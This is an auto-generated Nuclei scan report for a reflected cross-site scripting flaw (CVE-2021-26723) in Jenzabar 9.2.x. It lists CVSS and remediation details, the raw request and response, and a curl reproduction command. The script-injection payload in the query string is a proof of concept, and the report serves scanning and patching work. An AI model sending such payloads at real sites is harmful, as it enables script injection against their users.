Jenzabar 9.2x-9.2.2 - Cross-Site Scripting (CVE-2021-26723) found on honey.scanme.sh

[mkrs2404]

Details: CVE-2021-26723 matched at honey.scanme.sh

Protocol: HTTP

Full URL: https://honey.scanme.sh/ics?tool=search&query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E

Timestamp: Tue Apr 30 13:42:07 +0000 UTC 2024

Source: https://cloud.projectdiscovery.io/vuln/0427ca0bfad77aee9c6701cc83dc0b26

Template Information

Key	Value
Name	Jenzabar 9.2x-9.2.2 - Cross-Site Scripting
Authors	pikpikcu
Tags	cve2021, cve, packetstorm, jenzabar, xss
Severity	medium
Description	Jenzabar 9.2.x through 9.2.2 contains a cross-site scripting vulnerability. It allows /ics?tool=search&query.
Remediation	Apply the latest security patch or upgrade to a non-vulnerable version of Jenzabar 9.2x-9.2.2.
CVSS-Metrics	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE-ID	CWE-79
CVE-ID	CVE-2021-26723
CVSS-Score	6.10
vendor	jenzabar
product	jenzabar

Request

GET /ics?tool=search&query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: honey.scanme.sh
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 308
Content-Type: text/html
Date: Tue, 30 Apr 2024 13:42:06 GMT

GET /ics?tool=search&query="><script>alert(document.domain)</script> HTTP/1.1
Host: honey.scanme.sh
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36

References:

• http://packetstormsecurity.com/files/161303/Jenzabar-9.2.2-Cross-Site-Scripting.html
• https://gist.github.com/Y0ung-DST/d1b6b65be6248b0ffc2b2f2120deb205
• https://jenzabar.com/blog
• https://y0ungdst.medium.com/xss-in-jenzabar-cve-2021-26723-a0749231328
• https://nvd.nist.gov/vuln/detail/CVE-2021-26723

CURL command

curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36' 'https://honey.scanme.sh/ics?tool=search&query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E'

---

Generated by Nuclei v3.2.5